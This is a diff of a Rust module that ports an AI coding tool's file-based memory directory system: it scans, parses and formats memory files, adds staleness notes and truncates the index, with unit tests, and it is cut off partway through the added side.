Mirrors the -//! TypeScript modules under `src/memdir/`: -//! - `memoryScan.ts` → `scan_memory_dir`, `parse_frontmatter_quick`, `format_memory_manifest` -//! - `memoryAge.ts` → `memory_age_days`, `memory_freshness_text`, `memory_freshness_note` -//! - `memdir.ts` → `build_memory_prompt_content`, `load_memory_index`, `ensure_memory_dir_exists` -//! - `paths.ts` → `auto_memory_path`, `is_auto_memory_enabled` - -use std::path::{Path, PathBuf}; -use std::time::{SystemTime, UNIX_EPOCH}; -use serde::{Deserialize, Serialize}; - -// --------------------------------------------------------------------------- -// Memory type taxonomy -// --------------------------------------------------------------------------- - -/// The four canonical memory types. -/// Matches the TypeScript `MemoryType` union in `memoryTypes.ts`. -#[derive(Debug, Clone, PartialEq, Serialize, Deserialize)] -#[serde(rename_all = "lowercase")] -pub enum MemoryType { - /// Information about the user's role, goals, and preferences. - User, - /// Guidance the user has given about how to approach work. - Feedback, - /// Information about ongoing work, goals, or incidents in the project. - Project, - /// Pointers to where information lives in external systems. - Reference, -} - -impl MemoryType { - /// Parse a raw frontmatter value into a `MemoryType`. - /// Returns `None` for missing or unrecognised values (legacy files degrade gracefully). - pub fn parse(raw: &str) -> Option { - match raw.trim() { - "user" => Some(Self::User), - "feedback" => Some(Self::Feedback), - "project" => Some(Self::Project), - "reference" => Some(Self::Reference), - _ => None, - } - } - - /// Display as a lowercase string. - pub fn as_str(&self) -> &'static str { - match self { - Self::User => "user", - Self::Feedback => "feedback", - Self::Project => "project", - Self::Reference => "reference", - } - } -} - -// --------------------------------------------------------------------------- -// Memory file metadata and content -// --------------------------------------------------------------------------- - -/// Scanned metadata for a single memory file (without the full body). -/// Mirrors `MemoryHeader` in `memoryScan.ts`. -#[derive(Debug, Clone)] -pub struct MemoryFileMeta { - /// Filename relative to the memory directory (e.g. `user_role.md`). - pub filename: String, - /// Absolute path to the file. - pub path: PathBuf, - /// `name:` frontmatter field. - pub name: Option, - /// `description:` frontmatter field (used for relevance scoring). - pub description: Option, - /// `type:` frontmatter field. - pub memory_type: Option, - /// File modification time in seconds since UNIX epoch. - pub modified_secs: u64, -} - -/// A fully-loaded memory file including its body. -#[derive(Debug, Clone)] -pub struct MemoryFile { - pub meta: MemoryFileMeta, - pub content: String, -} - -// --------------------------------------------------------------------------- -// Directory scanning -// --------------------------------------------------------------------------- - -/// Maximum number of memory files kept after sorting. -/// Matches `MAX_MEMORY_FILES` in `memoryScan.ts`. -const MAX_MEMORY_FILES: usize = 200; - -/// Number of lines scanned for frontmatter. -/// Matches `FRONTMATTER_MAX_LINES` in `memoryScan.ts`. -const FRONTMATTER_MAX_LINES: usize = 30; - -/// Scan a memory directory, returning metadata for all `.md` files -/// (excluding `MEMORY.md`), sorted newest-first, capped at `MAX_MEMORY_FILES`. -/// -/// This is a synchronous scan used during system-prompt assembly. -/// Mirrors `scanMemoryFiles` in `memoryScan.ts` (async version; this is the -/// sync equivalent used at prompt-build time). -pub fn scan_memory_dir(dir: &Path) -> Vec { - let mut files: Vec = Vec::new(); - - if !dir.exists() { - return files; - } - - // Walk recursively using `walkdir`-style manual recursion to stay - // dependency-free (only std). - collect_md_files(dir, dir, &mut files); - - // Sort newest-first. - files.sort_by(|a, b| b.modified_secs.cmp(&a.modified_secs)); - files.truncate(MAX_MEMORY_FILES); - files -} - -/// Recursively collect `.md` files (excluding `MEMORY.md`) from `current_dir`. -fn collect_md_files(base: &Path, current_dir: &Path, out: &mut Vec) { - let Ok(entries) = std::fs::read_dir(current_dir) else { - return; - }; - - for entry in entries.flatten() { - let path = entry.path(); - if path.is_dir() { - collect_md_files(base, &path, out); - } else if path.extension().map(|e| e == "md").unwrap_or(false) { - let file_name = path.file_name().map(|n| n.to_string_lossy().into_owned()).unwrap_or_default(); - if file_name == "MEMORY.md" { - continue; - } - - let modified_secs = entry - .metadata() - .and_then(|m| m.modified()) - .map(|t| t.duration_since(UNIX_EPOCH).unwrap_or_default().as_secs()) - .unwrap_or(0); - - let (name, description, memory_type) = - if let Ok(content) = std::fs::read_to_string(&path) { - parse_frontmatter_quick(&content) - } else { - (None, None, None) - }; - - // Relative path from the memory dir root. - let relative = path - .strip_prefix(base) - .map(|p| p.to_string_lossy().into_owned()) - .unwrap_or_else(|_| file_name.clone()); - - out.push(MemoryFileMeta { - filename: relative, - path, - name, - description, - memory_type, - modified_secs, - }); - } - } -} - -/// Parse YAML frontmatter from the first `FRONTMATTER_MAX_LINES` lines without -/// a full YAML parser. Returns `(name, description, memory_type)`. -/// -/// Mirrors `parseFrontmatter` usage in `memoryScan.ts`. -pub fn parse_frontmatter_quick( - content: &str, -) -> (Option, Option, Option) { - let mut name = None; - let mut description = None; - let mut memory_type = None; - - let lines: Vec<&str> = content.lines().take(FRONTMATTER_MAX_LINES).collect(); - - // Frontmatter must start with `---` - if lines.first().map(|l| l.trim() != "---").unwrap_or(true) { - return (name, description, memory_type); - } - - for line in &lines[1..] { - if line.trim() == "---" { - break; - } - if let Some(rest) = line.strip_prefix("name:") { - name = Some(rest.trim().trim_matches('"').trim_matches('\'').to_string()); - } else if let Some(rest) = line.strip_prefix("description:") { - description = Some(rest.trim().trim_matches('"').trim_matches('\'').to_string()); - } else if let Some(rest) = line.strip_prefix("type:") { - memory_type = MemoryType::parse(rest.trim().trim_matches('"').trim_matches('\'')); - } - } - - (name, description, memory_type) -} - -/// Format memory headers as a text manifest: one entry per file with -/// `[type] filename (iso-timestamp): description`. -/// -/// Mirrors `formatMemoryManifest` in `memoryScan.ts`. -pub fn format_memory_manifest(memories: &[MemoryFileMeta]) -> String { - memories - .iter() - .map(|m| { - let tag = m - .memory_type - .as_ref() - .map(|t| format!("[{}] ", t.as_str())) - .unwrap_or_default(); - - // Convert modified_secs to an ISO-8601-like timestamp. - let ts = format_unix_secs_iso(m.modified_secs); - - match &m.description { - Some(desc) => format!("- {}{} ({}): {}", tag, m.filename, ts, desc), - None => format!("- {}{}", tag, m.filename), - } - }) - .collect::>() - .join("\n") -} - -/// Minimal ISO-8601 formatter for a Unix timestamp (no external deps). -fn format_unix_secs_iso(secs: u64) -> String { - // We use a very lightweight implementation to avoid pulling in chrono here - // (chrono is already a workspace dep but we want this module to stay lean). - // Accuracy to the day is sufficient for memory manifests. - let days_since_epoch = secs / 86400; - // Julian Day Number for 1970-01-01 is 2440588. - let jdn = days_since_epoch as u32 + 2440588; - let (y, m, d) = jdn_to_ymd(jdn); - let hh = (secs % 86400) / 3600; - let mm = (secs % 3600) / 60; - let ss = secs % 60; - format!("{:04}-{:02}-{:02}T{:02}:{:02}:{:02}Z", y, m, d, hh, mm, ss) -} - -/// Convert a Julian Day Number to (year, month, day). -fn jdn_to_ymd(jdn: u32) -> (u32, u32, u32) { - let a = jdn + 32044; - let b = (4 * a + 3) / 146097; - let c = a - (146097 * b) / 4; - let d = (4 * c + 3) / 1461; - let e = c - (1461 * d) / 4; - let m = (5 * e + 2) / 153; - let day = e - (153 * m + 2) / 5 + 1; - let month = m + 3 - 12 * (m / 10); - let year = 100 * b + d - 4800 + m / 10; - (year, month, day) -} - -// --------------------------------------------------------------------------- -// Memory age / freshness -// --------------------------------------------------------------------------- - -/// Days elapsed since `modified_secs`. Floor-rounded; clamped to 0 for -/// future mtimes (clock skew). -/// -/// Mirrors `memoryAgeDays` in `memoryAge.ts`. -pub fn memory_age_days(modified_secs: u64) -> u64 { - let now = SystemTime::now() - .duration_since(UNIX_EPOCH) - .unwrap_or_default() - .as_secs(); - (now.saturating_sub(modified_secs)) / 86400 -} - -/// Human-readable age string. Models are poor at date arithmetic — a raw -/// ISO timestamp does not trigger staleness reasoning the way "47 days ago" does. -/// -/// Mirrors `memoryAge` in `memoryAge.ts`. -pub fn memory_age(modified_secs: u64) -> String { - let d = memory_age_days(modified_secs); - match d { - 0 => "today".to_string(), - 1 => "yesterday".to_string(), - n => format!("{} days ago", n), - } -} - -/// Plain-text staleness caveat for memories > 1 day old. -/// Returns an empty string for fresh memories (today / yesterday). -/// -/// Mirrors `memoryFreshnessText` in `memoryAge.ts`. -pub fn memory_freshness_text(modified_secs: u64) -> String { - let d = memory_age_days(modified_secs); - if d <= 1 { - return String::new(); - } - format!( - "This memory is {} days old. \ - Memories are point-in-time observations, not live state — \ - claims about code behavior or file:line citations may be outdated. \ - Verify against current code before asserting as fact.", - d - ) -} - -/// Per-memory staleness note wrapped in `` tags. -/// Returns an empty string for memories ≤ 1 day old. -/// -/// Mirrors `memoryFreshnessNote` in `memoryAge.ts`. -pub fn memory_freshness_note(modified_secs: u64) -> String { - let text = memory_freshness_text(modified_secs); - if text.is_empty() { - return String::new(); - } - format!("{}\n", text) -} - -// --------------------------------------------------------------------------- -// Path resolution -// --------------------------------------------------------------------------- - -/// Entrypoint filename within the memory directory. -pub const MEMORY_ENTRYPOINT: &str = "MEMORY.md"; - -/// Maximum number of lines loaded from `MEMORY.md`. -/// Matches `MAX_ENTRYPOINT_LINES` in `memdir.ts`. -pub const MAX_ENTRYPOINT_LINES: usize = 200; - -/// Maximum bytes loaded from `MEMORY.md`. -/// Matches `MAX_ENTRYPOINT_BYTES` in `memdir.ts`. -pub const MAX_ENTRYPOINT_BYTES: usize = 25_000; - -/// Compute the auto-memory directory path for a project root. -/// -/// Resolution order (mirrors `getAutoMemPath` in `paths.ts`): -/// 1. `CLAUDE_COWORK_MEMORY_PATH_OVERRIDE` env var (full-path override). -/// 2. `/projects//memory/` -/// when `COVEN_CODE_REMOTE_MEMORY_DIR` is set. -/// 3. `~/.coven-code/projects//memory/` (default). -pub fn auto_memory_path(project_root: &Path) -> PathBuf { - // 1. Cowork full-path override. - if let Ok(override_path) = std::env::var("CLAUDE_COWORK_MEMORY_PATH_OVERRIDE") { - if !override_path.is_empty() { - return PathBuf::from(override_path); - } - } - - // 2. Determine the memory base directory. - let memory_base = std::env::var("COVEN_CODE_REMOTE_MEMORY_DIR") - .map(PathBuf::from) - .unwrap_or_else(|_| { - dirs::home_dir() - .unwrap_or_else(|| PathBuf::from(".")) - .join(".coven-code") - }); - - // 3. Sanitize the project root into a safe directory name. - let sanitized = sanitize_path_component(&project_root.to_string_lossy()); - - memory_base.join("projects").join(sanitized).join("memory") -} - -/// Sanitize an arbitrary string into a directory-name-safe component. -/// Matches `sanitizePath` used inside `getAutoMemPath` in `paths.ts`. -pub fn sanitize_path_component(s: &str) -> String { - s.chars() - .map(|c| { - if c.is_alphanumeric() || c == '-' || c == '_' || c == '.' { - c - } else { - '_' - } - }) - .collect() -} - -/// Whether the auto-memory system is enabled for this session. -/// -/// Priority chain (mirrors `isAutoMemoryEnabled` in `paths.ts`): -/// 1. `COVEN_CODE_DISABLE_AUTO_MEMORY` — truthy → OFF, falsy (but defined) → ON. -/// 2. `COVEN_CODE_SIMPLE` (--bare) → OFF. -/// 3. Remote mode without `COVEN_CODE_REMOTE_MEMORY_DIR` → OFF. -/// 4. `settings_enabled` parameter (from settings.json `autoMemoryEnabled` field). -/// 5. Default: enabled. -pub fn is_auto_memory_enabled(settings_enabled: Option) -> bool { - if let Ok(val) = std::env::var("COVEN_CODE_DISABLE_AUTO_MEMORY") { - // Truthy values (non-empty, non-"0", non-"false") disable memory. - match val.to_lowercase().as_str() { - "" | "0" | "false" | "no" | "off" => return true, // defined-falsy → ON - _ => return false, // truthy → OFF - } - } - - if std::env::var("COVEN_CODE_SIMPLE").is_ok() { - return false; - } - - if std::env::var("COVEN_CODE_REMOTE").is_ok() - && std::env::var("COVEN_CODE_REMOTE_MEMORY_DIR").is_err() - { - return false; - } - - settings_enabled.unwrap_or(true) -} - -// --------------------------------------------------------------------------- -// Index loading and truncation -// --------------------------------------------------------------------------- - -/// Result of loading and (optionally) truncating the `MEMORY.md` entrypoint. -#[derive(Debug, Clone)] -pub struct EntrypointTruncation { - pub content: String, - pub line_count: usize, - pub byte_count: usize, - pub was_line_truncated: bool, - pub was_byte_truncated: bool, -} - -/// Truncate `MEMORY.md` content to `MAX_ENTRYPOINT_LINES` lines and -/// `MAX_ENTRYPOINT_BYTES` bytes, appending a warning when either cap fires. -/// -/// Mirrors `truncateEntrypointContent` in `memdir.ts`. -pub fn truncate_entrypoint_content(raw: &str) -> EntrypointTruncation { - let trimmed = raw.trim(); - let content_lines: Vec<&str> = trimmed.lines().collect(); - let line_count = content_lines.len(); - let byte_count = trimmed.len(); - - let was_line_truncated = line_count > MAX_ENTRYPOINT_LINES; - let was_byte_truncated = byte_count > MAX_ENTRYPOINT_BYTES; - - if !was_line_truncated && !was_byte_truncated { - return EntrypointTruncation { - content: trimmed.to_string(), - line_count, - byte_count, - was_line_truncated: false, - was_byte_truncated: false, - }; - } - - let mut truncated = if was_line_truncated { - content_lines[..MAX_ENTRYPOINT_LINES].join("\n") - } else { - trimmed.to_string() - }; - - if truncated.len() > MAX_ENTRYPOINT_BYTES { - let cut_at = truncated[..MAX_ENTRYPOINT_BYTES] - .rfind('\n') - .unwrap_or(MAX_ENTRYPOINT_BYTES); - truncated.truncate(cut_at); - } - - let reason = match (was_line_truncated, was_byte_truncated) { - (true, false) => format!("{} lines (limit: {})", line_count, MAX_ENTRYPOINT_LINES), - (false, true) => format!( - "{} bytes (limit: {}) — index entries are too long", - byte_count, MAX_ENTRYPOINT_BYTES - ), - _ => format!( - "{} lines and {} bytes", - line_count, byte_count - ), - }; - - truncated.push_str(&format!( - "\n\n> WARNING: {} is {}. Only part of it was loaded. \ - Keep index entries to one line under ~200 chars; move detail into topic files.", - MEMORY_ENTRYPOINT, reason - )); - - EntrypointTruncation { - content: truncated, - line_count, - byte_count, - was_line_truncated, - was_byte_truncated, - } -} - -/// Load and truncate the `MEMORY.md` index from `memory_dir`. -/// Returns `None` when the file does not exist or is empty. -/// -/// Mirrors the entrypoint-reading path in `buildMemoryPrompt` / `loadMemoryPrompt`. -pub fn load_memory_index(memory_dir: &Path) -> Option { - let index_path = memory_dir.join(MEMORY_ENTRYPOINT); - if !index_path.exists() { - return None; - } - let raw = std::fs::read_to_string(&index_path).ok()?; - if raw.trim().is_empty() { - return None; - } - Some(truncate_entrypoint_content(&raw)) -} - -// --------------------------------------------------------------------------- -// System-prompt memory content builder -// --------------------------------------------------------------------------- - -/// Build the memory content string to inject into the system prompt's -/// `` block. -/// -/// Always includes the `MEMORY.md` index when it exists. -/// Called during `build_system_prompt` → `SystemPromptOptions::memory_content`. -pub fn build_memory_prompt_content(memory_dir: &Path) -> String { - let mut parts: Vec = Vec::new(); - - if let Some(index) = load_memory_index(memory_dir) { - parts.push(format!("## Memory Index (MEMORY.md)\n{}", index.content)); - } - - parts.join("\n\n") -} - -/// Ensure the memory directory exists, creating it (and any parents) if needed. -/// Errors are silently swallowed (the Write tool will surface them if needed). -/// -/// Mirrors `ensureMemoryDirExists` in `memdir.ts`. -pub fn ensure_memory_dir_exists(memory_dir: &Path) { - if let Err(e) = std::fs::create_dir_all(memory_dir) { - // Log at debug level so --debug shows why, but don't abort. - tracing::debug!( - dir = %memory_dir.display(), - error = %e, - "ensureMemoryDirExists failed" - ); - } -} - -// --------------------------------------------------------------------------- -// Simple relevance search (no LLM side-query) -// --------------------------------------------------------------------------- - -/// Find and load the most relevant memory files for a query using a -/// lightweight TF-IDF-style keyword score. -/// -/// The full Sonnet side-query (`findRelevantMemories` in TypeScript) lives -/// in `cc-query`; this function provides a cheaper fallback for contexts -/// where an API call is not available. -pub fn find_relevant_memories_simple( - memory_dir: &Path, - query: &str, - max_files: usize, -) -> Vec { - let metas = scan_memory_dir(memory_dir); - let query_lower = query.to_lowercase(); - let query_words: Vec<&str> = query_lower.split_whitespace().collect(); - - if query_words.is_empty() { - return Vec::new(); - } - - let mut scored: Vec<(f32, MemoryFileMeta)> = metas - .into_iter() - .filter_map(|meta| { - let desc = meta.description.as_deref().unwrap_or("").to_lowercase(); - let name = meta.name.as_deref().unwrap_or("").to_lowercase(); - let filename = meta.filename.to_lowercase(); - - let score: f32 = query_words - .iter() - .map(|w| { - let in_name = if name.contains(*w) { 2.0_f32 } else { 0.0 }; - let in_desc = if desc.contains(*w) { 1.0_f32 } else { 0.0 }; - let in_file = if filename.contains(*w) { 0.5_f32 } else { 0.0 }; - in_name + in_desc + in_file - }) - .sum(); - - if score > 0.0 { Some((score, meta)) } else { None } - }) - .collect(); - - // Sort highest score first. - scored.sort_by(|a, b| b.0.partial_cmp(&a.0).unwrap_or(std::cmp::Ordering::Equal)); - - scored - .into_iter() - .take(max_files) - .filter_map(|(_, meta)| { - let content = std::fs::read_to_string(&meta.path).ok()?; - Some(MemoryFile { meta, content }) - }) - .collect() -} - -// --------------------------------------------------------------------------- -// Team memory helpers -// --------------------------------------------------------------------------- - -/// Return the team-memory sub-directory path. -/// Mirrors `getTeamMemPath` in `teamMemPaths.ts`. -pub fn team_memory_path(auto_memory_dir: &Path) -> PathBuf { - auto_memory_dir.join("team") -} - -// --------------------------------------------------------------------------- -// Tests -// --------------------------------------------------------------------------- - -#[cfg(test)] -mod tests { - use super::*; - use std::io::Write as IoWrite; - - // Helpers ---------------------------------------------------------------- - - fn make_temp_dir() -> tempfile::TempDir { - tempfile::tempdir().expect("tempdir") - } - - fn write_file(dir: &Path, name: &str, content: &str) { - let path = dir.join(name); - if let Some(parent) = path.parent() { - std::fs::create_dir_all(parent).unwrap(); - } - let mut f = std::fs::File::create(&path).unwrap(); - f.write_all(content.as_bytes()).unwrap(); - } - - // ---- parse_frontmatter_quick ------------------------------------------- - - #[test] - fn test_parse_frontmatter_full() { - let content = "---\nname: My Memory\ndescription: A test description\ntype: feedback\n---\n\nBody text."; - let (name, desc, mt) = parse_frontmatter_quick(content); - assert_eq!(name.as_deref(), Some("My Memory")); - assert_eq!(desc.as_deref(), Some("A test description")); - assert_eq!(mt, Some(MemoryType::Feedback)); - } - - #[test] - fn test_parse_frontmatter_no_frontmatter() { - let content = "Just plain text."; - let (name, desc, mt) = parse_frontmatter_quick(content); - assert!(name.is_none()); - assert!(desc.is_none()); - assert!(mt.is_none()); - } - - #[test] - fn test_parse_frontmatter_quoted_values() { - let content = "---\nname: \"Quoted Name\"\ndescription: 'Single quoted'\ntype: user\n---"; - let (name, desc, mt) = parse_frontmatter_quick(content); - assert_eq!(name.as_deref(), Some("Quoted Name")); - assert_eq!(desc.as_deref(), Some("Single quoted")); - assert_eq!(mt, Some(MemoryType::User)); - } - - #[test] - fn test_parse_frontmatter_unknown_type() { - let content = "---\ntype: unknown_type\n---"; - let (_, _, mt) = parse_frontmatter_quick(content); - assert!(mt.is_none()); - } - - // ---- memory_age_days --------------------------------------------------- - - #[test] - fn test_memory_age_today() { - let now_secs = SystemTime::now() - .duration_since(UNIX_EPOCH) - .unwrap() - .as_secs(); - assert_eq!(memory_age_days(now_secs), 0); - } - - #[test] - fn test_memory_age_one_day_ago() { - let yesterday = SystemTime::now() - .duration_since(UNIX_EPOCH) - .unwrap() - .as_secs() - .saturating_sub(86_400); - assert_eq!(memory_age_days(yesterday), 1); - } - - #[test] - fn test_memory_age_future_clamps_to_zero() { - let far_future = u64::MAX; - assert_eq!(memory_age_days(far_future), 0); - } - - // ---- memory_freshness_text --------------------------------------------- - - #[test] - fn test_freshness_text_fresh() { - let now = SystemTime::now().duration_since(UNIX_EPOCH).unwrap().as_secs(); - assert!(memory_freshness_text(now).is_empty()); - } - - #[test] - fn test_freshness_text_stale() { - let old = SystemTime::now() - .duration_since(UNIX_EPOCH) - .unwrap() - .as_secs() - .saturating_sub(10 * 86_400); // 10 days ago - let text = memory_freshness_text(old); - assert!(text.contains("10 days old")); - assert!(text.contains("point-in-time")); - } - - // ---- memory_freshness_note --------------------------------------------- - - #[test] - fn test_freshness_note_fresh_is_empty() { - let now = SystemTime::now().duration_since(UNIX_EPOCH).unwrap().as_secs(); - assert!(memory_freshness_note(now).is_empty()); - } - - #[test] - fn test_freshness_note_stale_has_tags() { - let old = SystemTime::now() - .duration_since(UNIX_EPOCH) - .unwrap() - .as_secs() - .saturating_sub(5 * 86_400); - let note = memory_freshness_note(old); - assert!(note.contains("")); - assert!(note.contains("")); - } - - // ---- truncate_entrypoint_content --------------------------------------- - - #[test] - fn test_truncate_no_truncation_needed() { - let content = "line1\nline2\nline3"; - let result = truncate_entrypoint_content(content); - assert!(!result.was_line_truncated); - assert!(!result.was_byte_truncated); - assert_eq!(result.content, content); - } - - #[test] - fn test_truncate_line_limit() { - let content = (0..=MAX_ENTRYPOINT_LINES) - .map(|i| format!("line {}", i)) - .collect::>() - .join("\n"); - let result = truncate_entrypoint_content(&content); - assert!(result.was_line_truncated); - assert!(result.content.contains("WARNING")); - } - - // ---- sanitize_path_component ------------------------------------------- - - #[test] - fn test_sanitize_path_component() { - assert_eq!(sanitize_path_component("/home/user/project"), "_home_user_project"); - assert_eq!(sanitize_path_component("normal-name_123"), "normal-name_123"); - assert_eq!(sanitize_path_component("C:\\Users\\foo"), "C__Users_foo"); - } - - // ---- load_memory_index ------------------------------------------------- - - #[test] - fn test_load_memory_index_nonexistent() { - let dir = make_temp_dir(); - assert!(load_memory_index(dir.path()).is_none()); - } - - #[test] - fn test_load_memory_index_empty() { - let dir = make_temp_dir(); - write_file(dir.path(), "MEMORY.md", " "); - assert!(load_memory_index(dir.path()).is_none()); - } - - #[test] - fn test_load_memory_index_with_content() { - let dir = make_temp_dir(); - write_file(dir.path(), "MEMORY.md", "- [test.md](test.md) — something"); - let result = load_memory_index(dir.path()).unwrap(); - assert!(result.content.contains("test.md")); - } - - // ---- scan_memory_dir --------------------------------------------------- - - #[test] - fn test_scan_excludes_memory_md() { - let dir = make_temp_dir(); - write_file(dir.path(), "MEMORY.md", "# index"); - write_file(dir.path(), "user_role.md", "---\nname: Role\n---"); - let metas = scan_memory_dir(dir.path()); - assert_eq!(metas.len(), 1); - assert_eq!(metas[0].filename, "user_role.md"); - } - - #[test] - fn test_scan_empty_dir() { - let dir = make_temp_dir(); - assert!(scan_memory_dir(dir.path()).is_empty()); - } - - #[test] - fn test_scan_nonexistent_dir() { - let path = PathBuf::from("/tmp/nonexistent_memory_dir_cc_rust_test_xyz"); - assert!(scan_memory_dir(&path).is_empty()); - } - - // ---- format_memory_manifest -------------------------------------------- - - #[test] - fn test_format_memory_manifest_with_description() { - let meta = MemoryFileMeta { - filename: "user_role.md".to_string(), - path: PathBuf::from("user_role.md"), - name: Some("User Role".to_string()), - description: Some("The user is a data scientist".to_string()), - memory_type: Some(MemoryType::User), - modified_secs: 0, - }; - let manifest = format_memory_manifest(&[meta]); - assert!(manifest.contains("[user]")); - assert!(manifest.contains("user_role.md")); - assert!(manifest.contains("data scientist")); - } - - #[test] - fn test_format_memory_manifest_no_description() { - let meta = MemoryFileMeta { - filename: "ref.md".to_string(), - path: PathBuf::from("ref.md"), - name: None, - description: None, - memory_type: None, - modified_secs: 0, - }; - let manifest = format_memory_manifest(&[meta]); - assert!(manifest.contains("ref.md")); - // No description separator colon - assert!(!manifest.contains("ref.md (")); - } - - // ---- MemoryType -------------------------------------------------------- - - #[test] - fn test_memory_type_roundtrip() { - for (s, expected) in [ - ("user", MemoryType::User), - ("feedback", MemoryType::Feedback), - ("project", MemoryType::Project), - ("reference", MemoryType::Reference), - ] { - let parsed = MemoryType::parse(s).unwrap(); - assert_eq!(parsed, expected); - assert_eq!(parsed.as_str(), s); - } - } - - #[test] - fn test_memory_type_unknown_returns_none() { - assert!(MemoryType::parse("bogus").is_none()); - } - - // ---- is_auto_memory_enabled ------------------------------------------- - - #[test] - fn test_auto_memory_enabled_default() { - // No env vars set for this test, settings None → should be enabled. - // We can't guarantee the test environment is clean, so just check it - // returns a bool without panicking. - let _ = is_auto_memory_enabled(None); - } - - #[test] - fn test_auto_memory_disabled_by_setting() { - // If settings explicitly disable it and no env override, returns false. - // We only test the settings-path without touching process env. - // Simulate: env vars not set, settings says false. - // We can't unset env vars reliably in tests, so just ensure the - // function handles Some(false) without panicking. - // (The full env-var paths are integration-tested separately.) - let _ = is_auto_memory_enabled(Some(false)); - } -} +//! Memory directory (memdir) system. +//! +//! Provides persistent, file-based memory across sessions. Mirrors the +//! TypeScript modules under `src/memdir/`: +//! - `memoryScan.ts` → `scan_memory_dir`, `parse_frontmatter_quick`, `format_memory_manifest` +//! - `memoryAge.ts` → `memory_age_days`, `memory_freshness_text`, `memory_freshness_note` +//! - `memdir.ts` → `build_memory_prompt_content`, `load_memory_index`, `ensure_memory_dir_exists` +//! - `paths.ts` → `auto_memory_path`, `is_auto_memory_enabled` + +use serde::{Deserialize, Serialize}; +use std::path::{Path, PathBuf}; +use std::time::{SystemTime, UNIX_EPOCH}; + +// --------------------------------------------------------------------------- +// Memory type taxonomy +// --------------------------------------------------------------------------- + +/// The four canonical memory types. +/// Matches the TypeScript `MemoryType` union in `memoryTypes.ts`. +#[derive(Debug, Clone, PartialEq, Serialize, Deserialize)] +#[serde(rename_all = "lowercase")] +pub enum MemoryType { + /// Information about the user's role, goals, and preferences. + User, + /// Guidance the user has given about how to approach work. + Feedback, + /// Information about ongoing work, goals, or incidents in the project. + Project, + /// Pointers to where information lives in external systems. + Reference, +} + +impl MemoryType { + /// Parse a raw frontmatter value into a `MemoryType`. + /// Returns `None` for missing or unrecognised values (legacy files degrade gracefully). + pub fn parse(raw: &str) -> Option { + match raw.trim() { + "user" => Some(Self::User), + "feedback" => Some(Self::Feedback), + "project" => Some(Self::Project), + "reference" => Some(Self::Reference), + _ => None, + } + } + + /// Display as a lowercase string. + pub fn as_str(&self) -> &'static str { + match self { + Self::User => "user", + Self::Feedback => "feedback", + Self::Project => "project", + Self::Reference => "reference", + } + } +} + +// --------------------------------------------------------------------------- +// Memory file metadata and content +// --------------------------------------------------------------------------- + +/// Scanned metadata for a single memory file (without the full body). +/// Mirrors `MemoryHeader` in `memoryScan.ts`. +#[derive(Debug, Clone)] +pub struct MemoryFileMeta { + /// Filename relative to the memory directory (e.g. `user_role.md`). + pub filename: String, + /// Absolute path to the file. + pub path: PathBuf, + /// `name:` frontmatter field. + pub name: Option, + /// `description:` frontmatter field (used for relevance scoring). + pub description: Option, + /// `type:` frontmatter field. + pub memory_type: Option, + /// File modification time in seconds since UNIX epoch. + pub modified_secs: u64, +} + +/// A fully-loaded memory file including its body. +#[derive(Debug, Clone)] +pub struct MemoryFile { + pub meta: MemoryFileMeta, + pub content: String, +} + +// --------------------------------------------------------------------------- +// Directory scanning +// --------------------------------------------------------------------------- + +/// Maximum number of memory files kept after sorting. +/// Matches `MAX_MEMORY_FILES` in `memoryScan.ts`. +const MAX_MEMORY_FILES: usize = 200; + +/// Number of lines scanned for frontmatter. +/// Matches `FRONTMATTER_MAX_LINES` in `memoryScan.ts`. +const FRONTMATTER_MAX_LINES: usize = 30; + +/// Scan a memory directory, returning metadata for all `.md` files +/// (excluding `MEMORY.md`), sorted newest-first, capped at `MAX_MEMORY_FILES`. +/// +/// This is a synchronous scan used during system-prompt assembly. +/// Mirrors `scanMemoryFiles` in `memoryScan.ts` (async version; this is the +/// sync equivalent used at prompt-build time). +pub fn scan_memory_dir(dir: &Path) -> Vec { + let mut files: Vec = Vec::new(); + + if !dir.exists() { + return files; + } + + // Walk recursively using `walkdir`-style manual recursion to stay + // dependency-free (only std). + collect_md_files(dir, dir, &mut files); + + // Sort newest-first. + files.sort_by_key(|file| std::cmp::Reverse(file.modified_secs)); + files.truncate(MAX_MEMORY_FILES); + files +} + +/// Recursively collect `.md` files (excluding `MEMORY.md`) from `current_dir`. +fn collect_md_files(base: &Path, current_dir: &Path, out: &mut Vec) { + let Ok(entries) = std::fs::read_dir(current_dir) else { + return; + }; + + for entry in entries.flatten() { + let path = entry.path(); + if path.is_dir() { + collect_md_files(base, &path, out); + } else if path.extension().map(|e| e == "md").unwrap_or(false) { + let file_name = path + .file_name() + .map(|n| n.to_string_lossy().into_owned()) + .unwrap_or_default(); + if file_name == "MEMORY.md" { + continue; + } + + let modified_secs = entry + .metadata() + .and_then(|m| m.modified()) + .map(|t| t.duration_since(UNIX_EPOCH).unwrap_or_default().as_secs()) + .unwrap_or(0); + + let (name, description, memory_type) = + if let Ok(content) = std::fs::read_to_string(&path) { + parse_frontmatter_quick(&content) + } else { + (None, None, None) + }; + + // Relative path from the memory dir root. + let relative = path + .strip_prefix(base) + .map(|p| p.to_string_lossy().into_owned()) + .unwrap_or_else(|_| file_name.clone()); + + out.push(MemoryFileMeta { + filename: relative, + path, + name, + description, + memory_type, + modified_secs, + }); + } + } +} + +/// Parse YAML frontmatter from the first `FRONTMATTER_MAX_LINES` lines without +/// a full YAML parser. Returns `(name, description, memory_type)`. +/// +/// Mirrors `parseFrontmatter` usage in `memoryScan.ts`. +pub fn parse_frontmatter_quick( + content: &str, +) -> (Option, Option, Option) { + let mut name = None; + let mut description = None; + let mut memory_type = None; + + let lines: Vec<&str> = content.lines().take(FRONTMATTER_MAX_LINES).collect(); + + // Frontmatter must start with `---` + if lines.first().map(|l| l.trim() != "---").unwrap_or(true) { + return (name, description, memory_type); + } + + for line in &lines[1..] { + if line.trim() == "---" { + break; + } + if let Some(rest) = line.strip_prefix("name:") { + name = Some(rest.trim().trim_matches('"').trim_matches('\'').to_string()); + } else if let Some(rest) = line.strip_prefix("description:") { + description = Some(rest.trim().trim_matches('"').trim_matches('\'').to_string()); + } else if let Some(rest) = line.strip_prefix("type:") { + memory_type = MemoryType::parse(rest.trim().trim_matches('"').trim_matches('\'')); + } + } + + (name, description, memory_type) +} + +/// Format memory headers as a text manifest: one entry per file with +/// `[type] filename (iso-timestamp): description`. +/// +/// Mirrors `formatMemoryManifest` in `memoryScan.ts`. +pub fn format_memory_manifest(memories: &[MemoryFileMeta]) -> String { + memories + .iter() + .map(|m| { + let tag = m + .memory_type + .as_ref() + .map(|t| format!("[{}] ", t.as_str())) + .unwrap_or_default(); + + // Convert modified_secs to 